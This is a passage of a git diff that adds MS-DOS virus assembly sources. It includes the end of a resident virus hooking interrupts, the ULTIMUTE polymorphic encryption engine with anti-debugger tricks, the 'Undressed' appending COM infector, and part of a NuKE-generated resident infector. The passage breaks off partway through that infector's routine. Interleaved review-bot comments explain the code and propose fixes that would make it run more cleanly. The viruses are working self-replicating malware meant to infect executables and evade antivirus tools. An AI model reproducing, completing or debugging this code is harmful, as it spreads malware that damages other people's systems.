ASSUME ES:RAM + MOV BX,BW046C ; Get system 
clock, low word + MOV CS:[SI+DW0171-BP02D4],BX ; Get system clock, low word + MOV CS:[SI+DW0173-BP02D4],BX ; Get system clock, low word + ASSUME ES:NOTHING + POP ES + POP BX + MOV [SI+DW0175-BP02D4],DX ; Save generation count + XOR AX,AX ; \ Address zero + MOV ES,AX ; / + ASSUME ES:VECTOR + MOV AX,BW0084 ; \ Save Int 21H offset (DW0260) + MOV CS:[SI-74H],AX ; + MOV AX,BW0086 ; \ Save Int 21H segment (DW0262) + MOV CS:[SI-72H],AX ; + MOV AX,BW0058 ; \ Save Int 16H offset (DW016D) + MOV CS:[SI+0FE99H],AX ; / + MOV AX,BW005A ; \ Save Int 16H segment (DW016F) + MOV CS:[SI+0FE9BH],AX ; / + MOV AX,BW0080 ; \ Save Int 20H offset (DW0269) + MOV CS:[SI-6BH],AX ; / + MOV AX,BW0082 ; \ Save Int 20H segment (DW026B) + MOV CS:[SI-69H],AX ; / + CLI + PUSH CS ; \ Set Int 21H segment + POP BW0086 ; / + MOV BW0084,SI ; \ Set Int 21H offset (BP023C) + SUB BW0084,0098H ; / + PUSH CS ; \ Set Int 20H segment + POP BW0082 ; / + MOV BW0080,SI ; \ Set Int 20H offset (BP0264) + SUB BW0080,70H ; / + PUSH CS ; \ Set Int 16H segment + POP BW005A ; / + MOV BW0058,SI ; \ Set Int 16H offset (BP015E) + SUB BW0058,0176H ; / + STI + ASSUME ES:NOTHING + POP ES + POP SI + POP BX + POP AX + RET + +ENDADR EQU $ + +CODE ENDS + + END + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.ultimute.asm b/MSDOS/Virus.MSDOS.Unknown.ultimute.asm new file mode 100644 index 00000000..3fc488a5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ultimute.asm 
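Review bot: The Int 21h hook's comments describe AH=4Ch as a load (`CMP AH,4CH ; Load?` and `BP0264: MOV AX,4C00H ; Fake a load`), but 4Ch is terminate-with-return-code; together with the `AH=0` case and the Int 20h entry the hook intercepts program termination and replaces it with `AH=31H` keep-process, which is how the virus stays resident. Suggest `CMP AH,4CH ; Terminate with return code?` and `MOV AX,4C00H ; Fake an AH=4Ch terminate so the Int 21h hook turns it into a keep`. The byte table `DB0177` also deserves a line of its own: the Int 16h routine scans it for the character BIOS returned (`CMP AL,CS:[SI]` in the `BP0225` loop) and on a hit substitutes the next entry (`MOV AL,CS:[SI+1]`), which looks like the keystroke-swapping payload the name refers to. That substitution only occurs after the clock and counter checks between `BP01D8` and `BP021E`, so a comment should say the payload is gated on timing rather than constant.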
@@ -0,0 +1,584 @@
+;
+; The ULTImate MUTation Engine .93 (c) 1993 Black Wolf Enterprises
+; pardon the title, had to think of something... }-)
+;
+;ULTIMUTE is a mutation engine written for security-type applications and
+;other areas where mutation of executable code is necessary. For my personal
+;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s,
+;using it to encrypt the code placed onto EXE's and COM's to protect them
+;from simple modification and/or unauthorized use. The encryption algorithms
+;themselves are terribly simple - the main point being that they change
+;each time and are difficult to trace through. This engine is written mainly
+;to keep a "hack one, hack 'em all" approach from working on protected code,
+;rather than to keep the code secure by a cryptologist's point of view.
+;
+;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling
+; code, largely variable size for decoder. Also includes variable
+; calling segmentation (i.e. CS<>ES<>DS, and can be called via
+; near call, far call, or interrupt, the last of which can be
+; useful as a memory-resident handler for multiple programs to
+; use).
+;
+;Note: Please - this program and it's source have been released as freeware,
+; but do NOT use the mutation engine in viruses! For one thing, the
+; decryptor sequence has several repetitive sequences that can be scanned
+; for, and for another, that just isn't what it was designed for and
+; I would NOT appreciate it. If you MUST use someone else's mutation
+; engine for such, use the TPE or MTE. I do NOT condone such, however.
+;
+;Any modifications made to this program should be listed below the solid line,
+;along with the name of the programmer and the date the file was changed.
+;Also - they should be commented where changed. If at all possible, report
+;modifications to file to the address listed in the documentation.
+;
+;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages
+;resulting from the use/misuse of this program. The user agrees to hold
+;the author harmless for any consequences that may occur directly or
+;indirectly from the use of this program by utilizing this program/file
+;in any manner. Please use the engine with care.
+;
+;Modifications:
+; None as of yet (original release version)
+
+.model tiny
+.radix 16
+.code
+
+ public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand
+
+;Underscores are used so that these routines can be called from C and other
+;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you
+;need to add underscores in their names as well. Also, the random number
+;generations may not be sound for all purposes. They do the job for this
+;program, but they may/may not be mathematically correct.
+
+;
+;ENTRY:
+; CX=Code Length BX=New_Entry_Point
+; DS:SI=Code AX=Calling Style
+; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call
+;
+;RETURN:
+; CX=New Size ES:DI = Same, now contains encrypted code
+; w/decryptor
+;
+_ULTMUTE:
+ push bp ax bx cx dx es ds si di
+ call Get_Our_Offset
+ Offset_Mark:
+ inc cx
+ inc cx
+ mov word ptr cs:[bp+1+Set_Size],cx
+ mov word ptr cs:[Start_Pos+bp],bx
+ call Init_Rand
+ call Get_Base_Reg
+ call Setup_Choices
+ call Create_EncDec
+ call Copy_Decrypt_Code
+ call Encrypt_It
+Ending_ULTMUTE:
+ pop di si ds es dx cx bx ax
+ add cx,cs:[Decryptor_Length+bp]
+ inc cx
+ inc cx
+ pop bp
+ cmp ax,3 ;Select Returning method, i.e. retn, retf, iret
+ je Int_Call
+ cmp ax,2
+ je Far_Call
+Near_Call:
+ retn
+Far_Call:
+ retf
+Int_Call:
+ iret
+;
+Get_Our_Offset:
+ mov bp,sp
+ mov bp,ss:[bp] ;This trick finds our current offset
+ sub bp,offset Offset_Mark ;from the compiling point, as it
+ ret ;is usually not constant....
+;
+Init_Rand:
+ push ax ds
+ xor ax,ax
+ mov ds,ax
+ mov ax,ds:[46c] ;Get seed from timer click at
+ pop ds ;0000:046c
+ mov cs:[rand_seed+bp],ax
+ pop ax
+ ret
+;
+Get_Rand:
+ push cx dx
+ mov ax,cs:[rand_seed+bp]
+ mov cx,0deadh
+ mul cx ;This probably isn't a good algorithm,
+ xor ax,0dada ;(understatement) but it works for
+ ror ax,1 ;our purposes in this application.
+ mov cs:[rand_seed+bp],ax
+ pop dx cx
+ ret
+;
+rand_seed dw 0
+Base_Reg db 0
+Base_Pointer db 0
+Start_Pos dw 0
+;
+Get_Base_Reg:
+ call Get_Rand
+ and ax,11b
+ cmp al,1 ;Eliminate CX for loop purposes
+ je Get_Base_Reg
+ mov byte ptr cs:[bp+Base_Reg],al
+ Do_Pointer_Reg:
+ call Get_Rand
+ shr al,1
+ jc Done_Base_Reg
+ mov byte ptr cs:[bp+Base_Pointer],0
+ ret
+ Done_Base_Reg:
+ mov byte ptr cs:[bp+Base_Pointer],1
+ ret
+;
+Setup_Choices:
+ push ds si
+ push cs
+ pop ds
+ mov si,bp
+
+ call Get_Rand
+ mov word ptr [si+Xor_It+2],ax ;Randomize Xor
+ call Get_Rand
+ mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub
+ mov word ptr [si+Dummy7+2],ax
+
+ call Get_Rand ;Randomize Add/Sub
+ mov word ptr [si+Dummy4+2],ax
+ mov word ptr [si+Dummy8+2],ax
+
+ call Get_Rand
+ mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes
+ mov byte ptr [si+Rand_Byte2],ah
+ call Get_Rand
+ mov byte ptr [si+Rand_Byte3],al
+ mov byte ptr [si+Rand_Byte4],ah
+ call Get_Rand
+ mov byte ptr [si+Rand_Byte5],al
+ mov byte ptr [si+Rand_Byte6],ah
+ call Get_Rand
+ mov byte ptr [si+Rand_Byte7],al
+ mov byte ptr [si+Rand_Byte8],ah
+ call Get_Rand
+ mov byte ptr [si+Rand_Byte9],al
+ mov byte ptr [si+Rand_Byte10],ah
+
+ mov al,byte ptr [si+Base_Reg]
+ Set_Switcher:
+ and byte ptr [si+Switcher+1],0e6 ;Delete Register
+ mov ah,al
+ shl ah,1
+ shl ah,1
+ shl ah,1
+ or byte ptr [Switcher+1+si],ah
+ Set_Switcher_Pointer:
+ push ax
+ mov al,byte ptr [si+Base_Pointer]
+ or byte ptr [si+Switcher+1],al
+ Set_Set_Pointy:
+ and byte ptr [si+Set_Pointy],0fe
+ or byte ptr [si+Set_Pointy],al
+ and byte ptr [si+Inc_Pointy],0fe
+ or byte ptr [si+Inc_Pointy],al
+ and byte ptr [si+Inc_Pointy+1],0fe
+ or byte ptr [si+Inc_Pointy+1],al
+ pop ax
+ Set_Xorit:
+ and byte ptr [si+Xor_It+1],0fc
+ or byte ptr [si+Xor_It+1],al
+ Set_Flip_It:
+ and byte ptr [si+Flip_It+1],0e4
+ or byte ptr [si+Flip_It+1],al
+ or byte ptr [si+Flip_It+1],ah
+ Set_Rotate_It:
+ and byte ptr [si+do_rotate+1],0fc
+ or byte ptr [si+do_rotate+1],al
+ and byte ptr [si+do_rot2+1],0fc
+ or byte ptr [si+do_rot2+1],al
+ Set_IncDec:
+ and byte ptr [si+inc_bx_com],0fc
+ or byte ptr [si+inc_bx_com],al
+ and byte ptr [si+dec_bx_com],0fc
+ or byte ptr [si+dec_bx_com],al
+
+ and byte ptr [si+Dummy5],0fc
+ or byte ptr [si+Dummy5],al
+ and byte ptr [si+Dummy6],0fc
+ or byte ptr [si+Dummy6],al
+
+ Set_AddSub:
+ and byte ptr [si+Dummy3+1],0fc
+ and byte ptr [si+Dummy4+1],0fc
+ or byte ptr [si+Dummy3+1],al
+ or byte ptr [si+Dummy4+1],al
+
+ and byte ptr [si+Dummy7+1],0fc
+ and byte ptr [si+Dummy8+1],0fc
+ or byte ptr [si+Dummy7+1],al
+ or byte ptr [si+Dummy8+1],al
+ pop si ds
+ ret
+;
+Create_EncDec:
+ push es di cx
+ push cs
+ pop es
+ lea di,[bp+Encrypt_Sequence]
+ call Get_Rand
+ and ax,1fh
+ shr ax,1 ;Insure odd number of encryptors to prevent
+ shl ax,1 ;things like "INC AX / DEC AX" to leave prog
+ inc ax ;unencrypted.
+
+ mov byte ptr cs:[bp+Encrypt_Length],al
+ xchg cx,ax
+Make_Pattern:
+ call Get_Rand
+ and ax,7
+ stosb
+ loop Make_Pattern
+ pop cx di es
+ ret
+;
+Copy_Decrypt_Code:
+ push si di bx cx ds
+ push bx di ;save for loop
+
+ push cs
+ pop ds
+
+ lea si,[bp+Set_Pointy]
+ movsw
+ movsb
+ lodsb ;Copy initial encryptor
+ movsw
+ movsb
+ lodsb
+ movsw
+
+ mov cl,byte ptr cs:[bp+Encrypt_Length]
+ xor ch,ch
+ lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier
+ Dec_Set_Loop:
+ push cx
+ lodsb
+ push si ;Create the Decryptor from Sequence
+
+ mov bl,al
+ xor bh,bh
+ shl bx,1
+ add bx,bp
+ add bx,offset Command_Table
+ mov ax,cs:[bx]
+
+ mov cl,ah
+ xor ah,ah
+
+ lea si,[Xor_It+bp]
+ add si,ax
+ repnz movsb
+
+ pop si
+ pop cx
+ loop Dec_Set_Loop
+
+
+ lea si,[Switcher+bp]
+ movsw
+ lodsb ;Finish off Decryptor
+ movsw
+ lodsb
+
+ movsw ;Loop Setup
+ movsw
+
+ pop si bx
+ mov ax,di ;Set Loop
+ sub ax,si ;Do size of loop and offset from loop
+
+ mov cs:[Decryptor_Length+bp],ax
+
+ push ax ;Changed for Jump
+ not ax
+ add ax,5
+ stosw
+ pop ax
+
+ add bx,ax ;Set initial Pointer
+ mov es:[si+1],bx
+
+ mov ax,di
+ pop ds cx bx di si
+ push si di bx cx
+Copy_Prog:
+ push ax
+ sub ax,di
+ add ax,bx
+ mov word ptr es:[di+1],ax
+ pop ax
+ mov di,ax
+ repnz movsb
+ pop cx bx di si
+ ret
+;
+Encrypt_It:
+ push bx cx di si
+
+ call set_seqp
+
+ mov ax,cs:[Decryptor_Length+bp]
+ inc ax
+ inc ax
+ add di,ax ;DI=start of code to be encrypted
+ ;CX=Length of code to encrypt
+ mov si,di
+ push es
+ pop ds
+Big_Enc_Loop:
+ push cx
+ call Switcher
+ mov cx,cs:[Encrypt_Length+bp]
+
+ Encrypt_Value:
+ push ax bx cx dx si di
+ mov si,cs:[Save_SI+bp]
+ dec si
+ mov bl,cs:[si] ;??
+ mov cs:[Save_SI+bp],si
+ lea si,cs:[Com_Table_2+bp]
+ xor bh,bh
+ shl bx,1
+ add si,bx
+ mov bx,cs:[si]
+ add bx,bp
+ mov word ptr cs:[Next_Command+bp],bx
+ pop di si dx cx bx ax
+ call cs:[Next_Command+bp]
+ Loop Encrypt_Value
+
+ pop cx
+ call Switcher
+ call Inc_Pointy
+ call set_seqp
+ loop Big_Enc_Loop
+ pop si di cx bx
+ ret
+
+Save_SI dw 0
+Next_Command dw 0
+set_seqp:
+ push si
+ lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence
+ add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence
+ mov cs:[Save_SI+bp],SI
+ pop si
+ ret
+;
+Command_Table: ;8 commands -> 3 bits.
+ db [Xor_It-Xor_It],(Flip_It-Xor_It-1)
+ db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1)
+ db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1)
+ db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1)
+ db [Dummy1-Xor_It],(Dummy2-Dummy1-1)
+ db [Dummy2-Xor_It],(Dummy3-Dummy2-1)
+ db [Dummy3-Xor_It],(Dummy4-Dummy3-1)
+ db [Dummy4-Xor_It],(Dummy5-Dummy4-1)
+Com_Table_2:
+ dw [offset Xor_It]
+ dw [offset Flip_It]
+ dw [offset Rotate_It_2]
+ dw [offset Rotate_It_1]
+ dw [offset Dummy5]
+ dw [offset Dummy6]
+ dw [offset Dummy7]
+ dw [offset Dummy8]
+;
+Set_Pointy:
+ mov di,1234 ;Pointer to Code
+ ret
+Set_Size:
+ mov cx,1234 ;Size
+ ret
+Switcher:
+ xchg bx,[di]
+ ret
+Inc_Pointy:
+ inc di
+ inc di
+ ret
+
+Loop_Mut:
+ dec cx
+ jz End_Loop_Mut
+ loop_set:
+ jmp _ULTMUTE
+ End_Loop_Mut:
+ ret
+Xor_It:
+ xor bx,1234
+ ret
+Flip_It:
+ xchg bh,bl
+ ret
+
+Rotate_It_1:
+ jmp before_rot
+do_rotate:
+ ror bx,1
+ jmp after_rot
+before_rot:
+ push ax
+ call Ports1
+ pop ax
+ jmp do_rotate
+Ports1:
+ in al,21
+ or al,02
+ out 21,al
+ ret
+
+Ports2:
+ in al,21
+ xor al,02
+ out 21,al
+ ret
+after_rot:
+ push ax
+ call ports2
+ pop ax
+ ret
+
+Rotate_It_2:
+ cli
+ jmp confuzzled1
+do_rot2:
+ rol bx,1
+ call Switch_Int_1_3
+ jmp donerot2
+
+confuzzled1:
+ call Switch_Int_1_3
+ jmp do_rot2
+
+Switch_Int_1_3:
+ push ax ds
+ xor ax,ax
+ mov ds,ax
+ jmp short exch1
+ db 0eah
+exch1:
+ xchg ax,word ptr ds:[4]
+ jmp short exch2
+ db 9ah
+exch2:
+ xchg ax,word ptr ds:[0c]
+ xchg ax,word ptr ds:[4]
+ pop ds ax
+ ret
+donerot2:
+ ret
+
+Dummy1:
+ jmp short inc_bx_com ;Kill Disassemblers
+ db 0ea
+ Rand_Byte1:
+ db 0ea
+ inc_bx_com:
+ inc bx
+ ret
+Dummy2:
+ jmp short Kill_1
+ Rand_Byte2:
+ db 0ea
+ Cont_Kill1:
+ cli
+ xchg ax,ds:[84]
+ xchg ax,ds:[84]
+ sti
+ pop ds ax
+ dec_bx_com:
+ dec bx
+ jmp short quit_Kill1
+ Kill_1:
+ push ax ds
+ xor ax,ax
+ mov ds,ax ;Anti-Debugger (Kills Int 21)
+ jmp short Cont_Kill1
+ Rand_Byte3:
+ db 0e8
+ quit_Kill1:
+ ret
+Dummy3:
+ add bx,1234
+ push bx
+ call throw_debugger
+ Rand_Byte4:
+ db 0e8 ;Prefetch Trick
+ into_throw:
+ sub bx,offset Rand_Byte4
+ add byte ptr [bx+trick_em+1],0ba
+ trick_em:
+ jmp short done_trick
+ Rand_Byte5:
+ db 0ea
+ throw_debugger:
+ pop bx
+ jmp short into_throw
+ Rand_Byte6:
+ db 0ea
+ done_trick:
+ sub byte ptr [bx+trick_em+1],0ba
+ pop bx
+ ret
+Dummy4:
+ sub bx,1234
+ jmp short Get_IRQ
+Rand_Byte7 db 0e8
+Kill_IRQ:
+ out 21,al
+ xor al,2
+ jmp short Restore_IRQ
+Rand_Byte8 db 0e8
+Rand_Byte9 db 0e8 ;This will kill the keyboard
+ Get_IRQ: ;IRQ
+ push ax
+ in al,21
+ xor al,2
+ jmp short Kill_IRQ
+Rand_Byte10 db 0e8
+Restore_IRQ:
+ out 21,al
+ pop ax
+ ret
+
+;The following are used for the encryption algorithm to reverse commands that
+;include anti-tracing.
+Dummy5:
+ dec bx
+ ret
+Dummy6:
+ inc bx
+ ret
+Dummy7:
+ sub bx,1234
+ ret
+Dummy8:
+ add bx,1234
+ ret
+;
+Decryptor_Length dw 0
+Encrypt_Length dw 0
+Encrypt_Sequence db 30 dup(0)
+;
+_END_ULTMUTE:
+end _ULTMUTE
diff --git a/MSDOS/Virus.MSDOS.Unknown.undr.asm b/MSDOS/Virus.MSDOS.Unknown.undr.asm
new file mode 100644
index 00000000..9dd8a5cb
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.undr.asm
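Review bot: `Rotate_It_2` executes `cli` as its first instruction but nothing on its path re-enables interrupts: `do_rot2` does `rol bx,1`, calls `Switch_Int_1_3` (which ends in `pop ds ax` / `ret`) and jumps to `donerot2: ret`, so the generated decryptor, and the engine itself when `Encrypt_It` dispatches through `Com_Table_2` to undo a `Rotate_It_1`, can return to the caller with IF=0 (the engine never runs `Dummy2`, the only fragment with an explicit `sti`). Unless leaving interrupts disabled is meant as a further anti-trace measure, `donerot2:` should read `sti` / `ret`; the `sti` still falls inside the byte range `Command_Table` copies, since that range stops one byte short of `Dummy1`. `Rotate_It_1` likewise does not preserve the entry state of IRQ1: `Ports1` sets mask bit 1 on port 21h and `Ports2` then clears it with `xor al,02` after a fresh `in`, so a keyboard that was masked on entry comes back unmasked, whereas `Dummy4`'s toggle-twice sequence (`Get_IRQ` / `Kill_IRQ` / `Restore_IRQ`) does restore it. A comment on each fragment listing what it leaves modified (IF, the PIC mask, the Int 1/Int 3 and Int 21h vectors) would help anyone embedding this engine as the header invites.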
@@ -0,0 +1,126 @@ +; Virus: The Undressed Virus +; Author: Arsonic[Codebreakers] +; Type: Appending +; Encryption: No +; +; Displays a Message on Feb 5th. +; Btw.. I Love Lisa..! +;--------------------------------------------------------------------------------------------------- +; AV-Product | Detected? | Comments +;--------------------------------------------------------------------------------------------------- +; F-Prot | No | Easy to Get Past.. FPROT SUCKS! +; TBAV | Unknown Virus | Well.. at least it aint say VCL! +; AVP | VCL.824 | VCL! ARRGGGHH! +;---------------------------------------------------------------------------------------------------- +db 0e9h,0,0 +start: +call delta +delta: +pop bp +sub bp,offset delta +mov cx,0ffffh ;kill heristics +fprot_loopy: +jmp back +mov ax,4c00h +int 21h +back: +loop fprot_loopy +mov cx,3 +nop +mov di,100h +nop +lea si,[bp+buffer] +nop +rep movsb +find_first: +mov ah,4ch +add ah,2 +nop +find_next: +nop +lea dx,[bp+filemask] +nop +int 21h +jnc infect +jmp check_payload +infect: +mov ax,3d02h +mov dx,9eh +int 21h +xchg ax,bx +mov ah,3dh +add ah,2 +mov cx,3 +lea dx,[bp+buffer] +int 21h +mov ax,word ptr[80h + 1ah] +nop +sub ax,end - start + 3 +nop +cmp ax,word ptr[bp+buffer+1] +nop +je close_file +mov ax,word ptr[80h + 1ah] +nop +sub ax,3 +nop +mov word ptr[bp+three+1],ax +mov ax,4200h +xor cx,cx +cwd +int 21h +mov ah,3eh +add ah,2 +nop +lea dx,[bp+three] +nop +mov cx,3 +nop +int 21h +mov ax,4202h +xor cx,cx +cwd +int 21h +mov ah,3eh +add ah,2 +nop +lea dx,[bp+start] +nop +mov cx,end - start +nop +int 21h +close_file: +mov ah,3ch +add ah,2 +int 21h +mov ah,4dh +add ah,2 +jmp find_next +check_payload: +mov ah,2ah +int 21h +cmp dh,2 ;is it febuary? +je next +jmp close +next: +cmp dl,5 ;the 5th? +je payload ;yes.. display the message +jmp close ;no.. return control to the program. +payload: +mov ah,9h ;display message +lea dx,[bp+message] +int 21h +int 00h ;get keypress +int 16h +int 20h ;return to dos. 
+close:
+mov di,100h ;return control to program
+jmp di
+three db 0e9h,0,0
+filemask db '*.co*',0 ;if *.com it would be detected as trival variant
+buffer db 0cdh,20h,0
+virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
+author db 'Arsonic[CB]',0 ; nice scan string..
+message db 'Happy Birthday Lisa!',10,13,'$'
+Lisa db 'I LOVE U LISA!',0
+end:
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.unevie.asm b/MSDOS/Virus.MSDOS.Unknown.unevie.asm
new file mode 100644
index 00000000..5087a461
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.unevie.asm
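Review bot: The payload comment `int 00h ;get keypress` is wrong: vector 0 is the divide-error handler and nothing in this hunk reads a key before `int 16h`, so it should read `int 00h ;invokes the divide-error vector, not a key read` with the key wait attributed to the following `int 16h`. Every DOS call in the file is hidden behind a split immediate (`mov ah,4ch` / `add ah,2`, `mov ah,3dh` / `add ah,2`, `mov ah,3eh` / `add ah,2`, `mov ah,3ch` / `add ah,2`, `mov ah,4dh` / `add ah,2`) with no comment naming the resulting function, so each pair should carry the effective number (`;AH=4Eh find first`, `;AH=3Fh read`, `;AH=40h write`, `;AH=3Eh close`, `;AH=4Fh find next`), since undoing that split is the only way a reader can follow the file-handling flow. `mov ax,word ptr[80h + 1ah]` and `mov dx,9eh` also deserve `;size / name fields of the default DTA at PSP:80h`, as the fixed offsets are otherwise unexplained.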
@@ -0,0 +1,473 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +sub byte ptr [di],087h +inc word ptr [di] +xor byte ptr [di],022h +inc word ptr [di] +xor byte ptr [di],030h +add byte ptr [di],075h +xor byte ptr [di],061h +sub byte ptr [di],0b9h +xor word ptr [di],0e185h +add word ptr [di],0aa17h +not word ptr [di] +inc byte ptr [di] +inc word ptr [di] +xor word ptr [di],0c3d7h +sub word ptr [di],04a83h +not byte ptr [di] +xor word ptr [di],06acdh +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! 
+ ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! 
+;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. 
AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! 
+jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; 